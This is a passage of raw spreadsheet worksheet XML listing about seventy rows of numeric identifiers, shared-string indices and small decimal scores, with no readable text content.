        <v>1.3691735E7</v>
      </c>
      <c r="C26003" s="2" t="s">
        <v>24999</v>
      </c>
      <c r="D26003" s="2">
        <v>1.0</v>
      </c>
      <c r="E26003" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26003" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26004" ht="15.75" customHeight="1">
      <c r="A26004" s="1">
        <v>25972.0</v>
      </c>
      <c r="B26004" s="2">
        <v>1.5292334E7</v>
      </c>
      <c r="C26004" s="2" t="s">
        <v>25000</v>
      </c>
      <c r="D26004" s="2">
        <v>1.0</v>
      </c>
      <c r="E26004" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26004" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26005" ht="15.75" customHeight="1">
      <c r="A26005" s="1">
        <v>26337.0</v>
      </c>
      <c r="B26005" s="2">
        <v>1.6743195E7</v>
      </c>
      <c r="C26005" s="2" t="s">
        <v>25001</v>
      </c>
      <c r="D26005" s="2">
        <v>1.0</v>
      </c>
      <c r="E26005" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26005" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26006" ht="15.75" customHeight="1">
      <c r="A26006" s="1">
        <v>27027.0</v>
      </c>
      <c r="B26006" s="2">
        <v>2.0040422E7</v>
      </c>
      <c r="C26006" s="2" t="s">
        <v>25002</v>
      </c>
      <c r="D26006" s="2">
        <v>1.0</v>
      </c>
      <c r="E26006" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26006" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26007" ht="15.75" customHeight="1">
      <c r="A26007" s="1">
        <v>27542.0</v>
      </c>
      <c r="B26007" s="2">
        <v>2.2306277E7</v>
      </c>
      <c r="C26007" s="2" t="s">
        <v>25003</v>
      </c>
      <c r="D26007" s="2">
        <v>1.0</v>
      </c>
      <c r="E26007" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26007" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26008" ht="15.75" customHeight="1">
      <c r="A26008" s="1">
        <v>27888.0</v>
      </c>
      <c r="B26008" s="2">
        <v>2.3590073E7</v>
      </c>
      <c r="C26008" s="2" t="s">
        <v>24986</v>
      </c>
      <c r="D26008" s="2">
        <v>1.0</v>
      </c>
      <c r="E26008" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26008" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26009" ht="15.75" customHeight="1">
      <c r="A26009" s="1">
        <v>27912.0</v>
      </c>
      <c r="B26009" s="2">
        <v>2.3731247E7</v>
      </c>
      <c r="C26009" s="2" t="s">
        <v>25004</v>
      </c>
      <c r="D26009" s="2">
        <v>1.0</v>
      </c>
      <c r="E26009" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26009" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26010" ht="15.75" customHeight="1">
      <c r="A26010" s="1">
        <v>28026.0</v>
      </c>
      <c r="B26010" s="2">
        <v>2.4425826E7</v>
      </c>
      <c r="C26010" s="2" t="s">
        <v>25005</v>
      </c>
      <c r="D26010" s="2">
        <v>1.0</v>
      </c>
      <c r="E26010" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26010" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26011" ht="15.75" customHeight="1">
      <c r="A26011" s="1">
        <v>28233.0</v>
      </c>
      <c r="B26011" s="2">
        <v>2.5187204E7</v>
      </c>
      <c r="C26011" s="6" t="s">
        <v>25006</v>
      </c>
      <c r="D26011" s="2">
        <v>1.0</v>
      </c>
      <c r="E26011" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26011" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26012" ht="15.75" customHeight="1">
      <c r="A26012" s="1">
        <v>28280.0</v>
      </c>
      <c r="B26012" s="2">
        <v>2.5474446E7</v>
      </c>
      <c r="C26012" s="2" t="s">
        <v>25007</v>
      </c>
      <c r="D26012" s="2">
        <v>1.0</v>
      </c>
      <c r="E26012" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26012" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26013" ht="15.75" customHeight="1">
      <c r="A26013" s="1">
        <v>28905.0</v>
      </c>
      <c r="B26013" s="2">
        <v>2.939114E7</v>
      </c>
      <c r="C26013" s="2" t="s">
        <v>25008</v>
      </c>
      <c r="D26013" s="2">
        <v>1.0</v>
      </c>
      <c r="E26013" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26013" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26014" ht="15.75" customHeight="1">
      <c r="A26014" s="1">
        <v>28978.0</v>
      </c>
      <c r="B26014" s="2">
        <v>2.9816252E7</v>
      </c>
      <c r="C26014" s="2" t="s">
        <v>25009</v>
      </c>
      <c r="D26014" s="2">
        <v>1.0</v>
      </c>
      <c r="E26014" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26014" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26015" ht="15.75" customHeight="1">
      <c r="A26015" s="1">
        <v>29215.0</v>
      </c>
      <c r="B26015" s="2">
        <v>3.0789619E7</v>
      </c>
      <c r="C26015" s="2" t="s">
        <v>25010</v>
      </c>
      <c r="D26015" s="2">
        <v>1.0</v>
      </c>
      <c r="E26015" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26015" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26016" ht="15.75" customHeight="1">
      <c r="A26016" s="1">
        <v>29226.0</v>
      </c>
      <c r="B26016" s="2">
        <v>3.0827792E7</v>
      </c>
      <c r="C26016" s="2" t="s">
        <v>25011</v>
      </c>
      <c r="D26016" s="2">
        <v>1.0</v>
      </c>
      <c r="E26016" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26016" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26017" ht="15.75" customHeight="1">
      <c r="A26017" s="1">
        <v>29648.0</v>
      </c>
      <c r="B26017" s="2">
        <v>3.3845606E7</v>
      </c>
      <c r="C26017" s="2" t="s">
        <v>25012</v>
      </c>
      <c r="D26017" s="2">
        <v>1.0</v>
      </c>
      <c r="E26017" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26017" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26018" ht="15.75" customHeight="1">
      <c r="A26018" s="1">
        <v>29678.0</v>
      </c>
      <c r="B26018" s="2">
        <v>3.3994054E7</v>
      </c>
      <c r="C26018" s="2" t="s">
        <v>25013</v>
      </c>
      <c r="D26018" s="2">
        <v>1.0</v>
      </c>
      <c r="E26018" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26018" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26019" ht="15.75" customHeight="1">
      <c r="A26019" s="1">
        <v>29755.0</v>
      </c>
      <c r="B26019" s="2">
        <v>3.4771222E7</v>
      </c>
      <c r="C26019" s="2" t="s">
        <v>25014</v>
      </c>
      <c r="D26019" s="2">
        <v>1.0</v>
      </c>
      <c r="E26019" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26019" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26020" ht="15.75" customHeight="1">
      <c r="A26020" s="1">
        <v>29865.0</v>
      </c>
      <c r="B26020" s="2">
        <v>3.591648E7</v>
      </c>
      <c r="C26020" s="2" t="s">
        <v>25015</v>
      </c>
      <c r="D26020" s="2">
        <v>1.0</v>
      </c>
      <c r="E26020" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26020" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26021" ht="15.75" customHeight="1">
      <c r="A26021" s="1">
        <v>34245.0</v>
      </c>
      <c r="B26021" s="2">
        <v>4753345.0</v>
      </c>
      <c r="C26021" s="2" t="s">
        <v>25016</v>
      </c>
      <c r="D26021" s="2">
        <v>1.0</v>
      </c>
      <c r="E26021" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26021" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26022" ht="15.75" customHeight="1">
      <c r="A26022" s="1">
        <v>10441.0</v>
      </c>
      <c r="B26022" s="2">
        <v>1.0441087E7</v>
      </c>
      <c r="C26022" s="2" t="s">
        <v>25017</v>
      </c>
      <c r="D26022" s="2">
        <v>1.0</v>
      </c>
      <c r="E26022" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26022" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="26023" ht="15.75" customHeight="1">
      <c r="A26023" s="1">
        <v>18060.0</v>
      </c>
      <c r="B26023" s="2">
        <v>5.1602586E7</v>
      </c>
      <c r="C26023" s="2" t="s">
        <v>25018</v>
      </c>
      <c r="D26023" s="2">
        <v>1.0</v>
      </c>
      <c r="E26023" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26023" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="26024" ht="15.75" customHeight="1">
      <c r="A26024" s="1">
        <v>26068.0</v>
      </c>
      <c r="B26024" s="2">
        <v>1.5577603E7</v>
      </c>
      <c r="C26024" s="2" t="s">
        <v>25019</v>
      </c>
      <c r="D26024" s="2">
        <v>1.0</v>
      </c>
      <c r="E26024" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26024" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="26025" ht="15.75" customHeight="1">
      <c r="A26025" s="1">
        <v>30420.0</v>
      </c>
      <c r="B26025" s="2">
        <v>3.894059E7</v>
      </c>
      <c r="C26025" s="2" t="s">
        <v>25020</v>
      </c>
      <c r="D26025" s="2">
        <v>1.0</v>
      </c>
      <c r="E26025" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26025" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="26026" ht="15.75" customHeight="1">
      <c r="A26026" s="1">
        <v>30352.0</v>
      </c>
      <c r="B26026" s="2">
        <v>3.82462E7</v>
      </c>
      <c r="C26026" s="2" t="s">
        <v>25021</v>
      </c>
      <c r="D26026" s="2">
        <v>1.0</v>
      </c>
      <c r="E26026" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26026" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="26027" ht="15.75" customHeight="1">
      <c r="A26027" s="1">
        <v>2023.0</v>
      </c>
      <c r="B26027" s="2">
        <v>3.0785514E7</v>
      </c>
      <c r="C26027" s="2" t="s">
        <v>25022</v>
      </c>
      <c r="D26027" s="2">
        <v>1.0</v>
      </c>
      <c r="E26027" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26027" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="26028" ht="15.75" customHeight="1">
      <c r="A26028" s="1">
        <v>2100.0</v>
      </c>
      <c r="B26028" s="2">
        <v>3.130418E7</v>
      </c>
      <c r="C26028" s="2" t="s">
        <v>25023</v>
      </c>
      <c r="D26028" s="2">
        <v>1.0</v>
      </c>
      <c r="E26028" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26028" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="26029" ht="15.75" customHeight="1">
      <c r="A26029" s="1">
        <v>31000.0</v>
      </c>
      <c r="B26029" s="2">
        <v>4.7609721E7</v>
      </c>
      <c r="C26029" s="2" t="s">
        <v>25024</v>
      </c>
      <c r="D26029" s="2">
        <v>1.0</v>
      </c>
      <c r="E26029" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26029" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="26030" ht="15.75" customHeight="1">
      <c r="A26030" s="1">
        <v>30006.0</v>
      </c>
      <c r="B26030" s="2">
        <v>3612938.0</v>
      </c>
      <c r="C26030" s="2" t="s">
        <v>25025</v>
      </c>
      <c r="D26030" s="2">
        <v>1.0</v>
      </c>
      <c r="E26030" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26030" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="26031" ht="15.75" customHeight="1">
      <c r="A26031" s="1">
        <v>32675.0</v>
      </c>
      <c r="B26031" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C26031" s="2" t="s">
        <v>25026</v>
      </c>
      <c r="D26031" s="2">
        <v>1.0</v>
      </c>
      <c r="E26031" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26031" s="2">
        <v>0.1250000000000001</v>
      </c>
    </row>
    <row r="26032" ht="15.75" customHeight="1">
      <c r="A26032" s="1">
        <v>3518.0</v>
      </c>
      <c r="B26032" s="2">
        <v>3.859903E7</v>
      </c>
      <c r="C26032" s="2" t="s">
        <v>25027</v>
      </c>
      <c r="D26032" s="2">
        <v>1.0</v>
      </c>
      <c r="E26032" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26032" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="26033" ht="15.75" customHeight="1">
      <c r="A26033" s="1">
        <v>20552.0</v>
      </c>
      <c r="B26033" s="2">
        <v>1.3383283E7</v>
      </c>
      <c r="C26033" s="2" t="s">
        <v>25028</v>
      </c>
      <c r="D26033" s="2">
        <v>1.0</v>
      </c>
      <c r="E26033" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26033" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="26034" ht="15.75" customHeight="1">
      <c r="A26034" s="1">
        <v>22577.0</v>
      </c>
      <c r="B26034" s="2">
        <v>3.8762314E7</v>
      </c>
      <c r="C26034" s="2" t="s">
        <v>25029</v>
      </c>
      <c r="D26034" s="2">
        <v>1.0</v>
      </c>
      <c r="E26034" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26034" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="26035" ht="15.75" customHeight="1">
      <c r="A26035" s="1">
        <v>6455.0</v>
      </c>
      <c r="B26035" s="2">
        <v>4.8611517E7</v>
      </c>
      <c r="C26035" s="2" t="s">
        <v>25030</v>
      </c>
      <c r="D26035" s="2">
        <v>1.0</v>
      </c>
      <c r="E26035" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26035" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="26036" ht="15.75" customHeight="1">
      <c r="A26036" s="1">
        <v>32869.0</v>
      </c>
      <c r="B26036" s="2">
        <v>6300570.0</v>
      </c>
      <c r="C26036" s="2" t="s">
        <v>25031</v>
      </c>
      <c r="D26036" s="2">
        <v>1.0</v>
      </c>
      <c r="E26036" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26036" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="26037" ht="15.75" customHeight="1">
      <c r="A26037" s="1">
        <v>22279.0</v>
      </c>
      <c r="B26037" s="2">
        <v>3.3299959E7</v>
      </c>
      <c r="C26037" s="2" t="s">
        <v>25032</v>
      </c>
      <c r="D26037" s="2">
        <v>1.0</v>
      </c>
      <c r="E26037" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26037" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="26038" ht="15.75" customHeight="1">
      <c r="A26038" s="1">
        <v>26874.0</v>
      </c>
      <c r="B26038" s="2">
        <v>1.9144073E7</v>
      </c>
      <c r="C26038" s="2" t="s">
        <v>25033</v>
      </c>
      <c r="D26038" s="2">
        <v>1.0</v>
      </c>
      <c r="E26038" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26038" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="26039" ht="15.75" customHeight="1">
      <c r="A26039" s="1">
        <v>31950.0</v>
      </c>
      <c r="B26039" s="2">
        <v>5310055.0</v>
      </c>
      <c r="C26039" s="2" t="s">
        <v>25034</v>
      </c>
      <c r="D26039" s="2">
        <v>1.0</v>
      </c>
      <c r="E26039" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26039" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="26040" ht="15.75" customHeight="1">
      <c r="A26040" s="1">
        <v>14986.0</v>
      </c>
      <c r="B26040" s="2">
        <v>4.1409931E7</v>
      </c>
      <c r="C26040" s="2" t="s">
        <v>25035</v>
      </c>
      <c r="D26040" s="2">
        <v>1.0</v>
      </c>
      <c r="E26040" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26040" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="26041" ht="15.75" customHeight="1">
      <c r="A26041" s="1">
        <v>34150.0</v>
      </c>
      <c r="B26041" s="2">
        <v>9859548.0</v>
      </c>
      <c r="C26041" s="2" t="s">
        <v>25036</v>
      </c>
      <c r="D26041" s="2">
        <v>1.0</v>
      </c>
      <c r="E26041" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26041" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="26042" ht="15.75" customHeight="1">
      <c r="A26042" s="1">
        <v>3533.0</v>
      </c>
      <c r="B26042" s="2">
        <v>3.867027E7</v>
      </c>
      <c r="C26042" s="2" t="s">
        <v>25037</v>
      </c>
      <c r="D26042" s="2">
        <v>1.0</v>
      </c>
      <c r="E26042" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26042" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="26043" ht="15.75" customHeight="1">
      <c r="A26043" s="1">
        <v>4633.0</v>
      </c>
      <c r="B26043" s="2">
        <v>4.3001838E7</v>
      </c>
      <c r="C26043" s="2" t="s">
        <v>25038</v>
      </c>
      <c r="D26043" s="2">
        <v>1.0</v>
      </c>
      <c r="E26043" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26043" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="26044" ht="15.75" customHeight="1">
      <c r="A26044" s="1">
        <v>20127.0</v>
      </c>
      <c r="B26044" s="2">
        <v>1.0048919E7</v>
      </c>
      <c r="C26044" s="2" t="s">
        <v>25039</v>
      </c>
      <c r="D26044" s="2">
        <v>1.0</v>
      </c>
      <c r="E26044" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26044" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="26045" ht="15.75" customHeight="1">
      <c r="A26045" s="1">
        <v>21665.0</v>
      </c>
      <c r="B26045" s="2">
        <v>2.5006757E7</v>
      </c>
      <c r="C26045" s="2" t="s">
        <v>25040</v>
      </c>
      <c r="D26045" s="2">
        <v>1.0</v>
      </c>
      <c r="E26045" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26045" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="26046" ht="15.75" customHeight="1">
      <c r="A26046" s="1">
        <v>23248.0</v>
      </c>
      <c r="B26046" s="2">
        <v>5.3088565E7</v>
      </c>
      <c r="C26046" s="2" t="s">
        <v>25041</v>
      </c>
      <c r="D26046" s="2">
        <v>1.0</v>
      </c>
      <c r="E26046" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26046" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="26047" ht="15.75" customHeight="1">
      <c r="A26047" s="1">
        <v>26084.0</v>
      </c>
      <c r="B26047" s="2">
        <v>1.5655268E7</v>
      </c>
      <c r="C26047" s="2" t="s">
        <v>25042</v>
      </c>
      <c r="D26047" s="2">
        <v>1.0</v>
      </c>
      <c r="E26047" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26047" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="26048" ht="15.75" customHeight="1">
      <c r="A26048" s="1">
        <v>31942.0</v>
      </c>
      <c r="B26048" s="2">
        <v>5.3088564E7</v>
      </c>
      <c r="C26048" s="2" t="s">
        <v>25043</v>
      </c>
      <c r="D26048" s="2">
        <v>1.0</v>
      </c>
      <c r="E26048" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26048" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="26049" ht="15.75" customHeight="1">
      <c r="A26049" s="1">
        <v>32221.0</v>
      </c>
      <c r="B26049" s="2">
        <v>5488862.0</v>
      </c>
      <c r="C26049" s="2" t="s">
        <v>25044</v>
      </c>
      <c r="D26049" s="2">
        <v>1.0</v>
      </c>
      <c r="E26049" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26049" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="26050" ht="15.75" customHeight="1">
      <c r="A26050" s="1">
        <v>1220.0</v>
      </c>
      <c r="B26050" s="2">
        <v>2487911.0</v>
      </c>
      <c r="C26050" s="2" t="s">
        <v>25045</v>
      </c>
      <c r="D26050" s="2">
        <v>1.0</v>
      </c>
      <c r="E26050" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26050" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="26051" ht="15.75" customHeight="1">
      <c r="A26051" s="1">
        <v>2690.0</v>
      </c>
      <c r="B26051" s="2">
        <v>3.4819678E7</v>
      </c>
      <c r="C26051" s="2" t="s">
        <v>25046</v>
      </c>
      <c r="D26051" s="2">
        <v>1.0</v>
      </c>
      <c r="E26051" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26051" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="26052" ht="15.75" customHeight="1">
      <c r="A26052" s="1">
        <v>3824.0</v>
      </c>
      <c r="B26052" s="2">
        <v>4.0140574E7</v>
      </c>
      <c r="C26052" s="2" t="s">
        <v>25047</v>
      </c>
      <c r="D26052" s="2">
        <v>1.0</v>
      </c>
      <c r="E26052" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26052" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="26053" ht="15.75" customHeight="1">
      <c r="A26053" s="1">
        <v>6978.0</v>
      </c>
      <c r="B26053" s="2">
        <v>5.0030166E7</v>
      </c>
      <c r="C26053" s="2" t="s">
        <v>25048</v>
      </c>
      <c r="D26053" s="2">
        <v>1.0</v>
      </c>
      <c r="E26053" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26053" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="26054" ht="15.75" customHeight="1">
      <c r="A26054" s="1">
        <v>13732.0</v>
      </c>
      <c r="B26054" s="2">
        <v>3.6413645E7</v>
      </c>
      <c r="C26054" s="2" t="s">
        <v>25049</v>
      </c>
      <c r="D26054" s="2">
        <v>1.0</v>
      </c>
      <c r="E26054" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26054" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="26055" ht="15.75" customHeight="1">
      <c r="A26055" s="1">
        <v>14410.0</v>
      </c>
      <c r="B26055" s="2">
        <v>3.9216699E7</v>
      </c>
      <c r="C26055" s="2" t="s">
        <v>25050</v>
      </c>
      <c r="D26055" s="2">
        <v>1.0</v>
      </c>
      <c r="E26055" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26055" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="26056" ht="15.75" customHeight="1">
      <c r="A26056" s="1">
        <v>20970.0</v>
      </c>
      <c r="B26056" s="2">
        <v>1.6797158E7</v>
      </c>
      <c r="C26056" s="2" t="s">
        <v>25051</v>
      </c>
      <c r="D26056" s="2">
        <v>1.0</v>
      </c>
      <c r="E26056" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26056" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="26057" ht="15.75" customHeight="1">
      <c r="A26057" s="1">
        <v>23671.0</v>
      </c>
      <c r="B26057" s="2">
        <v>6907569.0</v>
      </c>
      <c r="C26057" s="2" t="s">
        <v>25052</v>
      </c>
      <c r="D26057" s="2">
        <v>1.0</v>
      </c>
      <c r="E26057" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26057" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="26058" ht="15.75" customHeight="1">
      <c r="A26058" s="1">
        <v>23575.0</v>
      </c>
      <c r="B26058" s="2">
        <v>6240384.0</v>
      </c>
      <c r="C26058" s="2" t="s">
        <v>25053</v>
      </c>
      <c r="D26058" s="2">
        <v>1.0</v>
      </c>
      <c r="E26058" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26058" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="26059" ht="15.75" customHeight="1">
      <c r="A26059" s="1">
        <v>22368.0</v>
      </c>
      <c r="B26059" s="2">
        <v>3.4949194E7</v>
      </c>
      <c r="C26059" s="2" t="s">
        <v>25054</v>
      </c>
      <c r="D26059" s="2">
        <v>1.0</v>
      </c>
      <c r="E26059" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26059" s="2">
        <v>0.1239316239316239</v>
      </c>
    </row>
    <row r="26060" ht="15.75" customHeight="1">
      <c r="A26060" s="1">
        <v>230.0</v>
      </c>
      <c r="B26060" s="2">
        <v>1.4758457E7</v>
      </c>
      <c r="C26060" s="2" t="s">
        <v>25055</v>
      </c>
      <c r="D26060" s="2">
        <v>1.0</v>
      </c>
      <c r="E26060" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26060" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26061" ht="15.75" customHeight="1">
      <c r="A26061" s="1">
        <v>1209.0</v>
      </c>
      <c r="B26061" s="2">
        <v>2.4834189E7</v>
      </c>
      <c r="C26061" s="2" t="s">
        <v>25056</v>
      </c>
      <c r="D26061" s="2">
        <v>1.0</v>
      </c>
      <c r="E26061" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26061" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26062" ht="15.75" customHeight="1">
      <c r="A26062" s="1">
        <v>1632.0</v>
      </c>
      <c r="B26062" s="2">
        <v>2.7998059E7</v>
      </c>
      <c r="C26062" s="2" t="s">
        <v>25057</v>
      </c>
      <c r="D26062" s="2">
        <v>1.0</v>
      </c>
      <c r="E26062" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26062" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26063" ht="15.75" customHeight="1">
      <c r="A26063" s="1">
        <v>9892.0</v>
      </c>
      <c r="B26063" s="2">
        <v>5.6762819E7</v>
      </c>
      <c r="C26063" s="2" t="s">
        <v>25058</v>
      </c>
      <c r="D26063" s="2">
        <v>1.0</v>
      </c>
      <c r="E26063" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26063" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26064" ht="15.75" customHeight="1">
      <c r="A26064" s="1">
        <v>11860.0</v>
      </c>
      <c r="B26064" s="2">
        <v>2.4842746E7</v>
      </c>
      <c r="C26064" s="2" t="s">
        <v>25059</v>
      </c>
      <c r="D26064" s="2">
        <v>1.0</v>
      </c>
      <c r="E26064" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26064" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26065" ht="15.75" customHeight="1">
      <c r="A26065" s="1">
        <v>21677.0</v>
      </c>
      <c r="B26065" s="2">
        <v>2.50457E7</v>
      </c>
      <c r="C26065" s="2" t="s">
        <v>25060</v>
      </c>
      <c r="D26065" s="2">
        <v>1.0</v>
      </c>
      <c r="E26065" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26065" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26066" ht="15.75" customHeight="1">
      <c r="A26066" s="1">
        <v>24454.0</v>
      </c>
      <c r="B26066" s="2">
        <v>1.0934969E7</v>
      </c>
      <c r="C26066" s="2" t="s">
        <v>25061</v>
      </c>
      <c r="D26066" s="2">
        <v>1.0</v>
      </c>
      <c r="E26066" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26066" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26067" ht="15.75" customHeight="1">
      <c r="A26067" s="1">
        <v>25023.0</v>
      </c>
      <c r="B26067" s="2">
        <v>1.2805186E7</v>
      </c>
      <c r="C26067" s="2" t="s">
        <v>25062</v>
      </c>
      <c r="D26067" s="2">
        <v>1.0</v>
      </c>
      <c r="E26067" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26067" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26068" ht="15.75" customHeight="1">
      <c r="A26068" s="1">
        <v>26511.0</v>
      </c>
      <c r="B26068" s="2">
        <v>1.7604699E7</v>
      </c>
      <c r="C26068" s="2" t="s">
        <v>25063</v>
      </c>
      <c r="D26068" s="2">
        <v>1.0</v>
      </c>
      <c r="E26068" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26068" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26069" ht="15.75" customHeight="1">
      <c r="A26069" s="1">
        <v>28453.0</v>
      </c>
      <c r="B26069" s="2">
        <v>2.6593589E7</v>
      </c>
      <c r="C26069" s="2" t="s">
        <v>25064</v>
      </c>
      <c r="D26069" s="2">
        <v>1.0</v>
      </c>
      <c r="E26069" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26069" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26070" ht="15.75" customHeight="1">
      <c r="A26070" s="1">
        <v>28949.0</v>
      </c>
      <c r="B26070" s="2">
        <v>2.9720701E7</v>
      </c>
